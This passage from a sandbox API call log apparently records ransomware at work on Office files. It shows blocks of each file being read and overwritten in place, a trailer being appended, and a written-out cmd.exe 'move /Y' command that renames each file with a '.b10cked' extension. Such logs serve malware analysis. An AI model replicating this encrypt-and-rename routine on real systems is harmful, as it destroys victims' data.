dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.208] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.208] ReleaseMutex (hMutex=0xf8) returned 1 [0172.209] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) 
returned 0x0 [0172.209] ReleaseMutex (hMutex=0xf8) returned 1 [0172.209] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.209] ReleaseMutex (hMutex=0xf8) returned 1 [0172.209] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.209] ReleaseMutex (hMutex=0xf8) returned 1 [0172.209] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22923319330) returned 1 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.444] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.445] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.446] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x57f60 [0172.446] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.446] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x57a78 [0172.446] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x57f60 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x57f60 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.504] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.504] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, 
lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.613] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.614] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0172.616] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.616] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.616] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.617] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0172.617] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x37f60 [0172.617] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.622] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, 
lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0172.623] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0172.624] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x37f60 [0172.624] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.624] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0172.625] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0172.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0172.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBWZINT.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0172.628] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x57f60 [0172.629] 
WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0172.629] CloseHandle (hObject=0x114) returned 1 [0172.648] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX") returned 0x3c [0172.649] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0172.650] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUBWZINT.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x134, dwThreadId=0x740)) returned 1 [0172.743] CloseHandle (hObject=0x1b4) returned 1 [0172.743] CloseHandle (hObject=0x114) returned 1 [0172.743] CharUpperBuffW (in: 
lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.743] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0172.743] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0172.743] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.743] ReleaseMutex (hMutex=0xf8) returned 1 [0172.743] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.743] ReleaseMutex (hMutex=0xf8) returned 1 [0172.743] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.743] ReleaseMutex (hMutex=0xf8) returned 1 [0172.743] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0172.743] ReleaseMutex (hMutex=0xf8) returned 1 [0172.743] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22953307635) returned 1 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3360 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.744] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3360 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0172.745] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2e78 [0172.746] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3360 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3360 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0172.779] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.779] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19af, lpOverlapped=0x0) returned 1 [0172.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0172.845] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x19af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19af, lpOverlapped=0x0) returned 1 [0172.845] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6575, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: 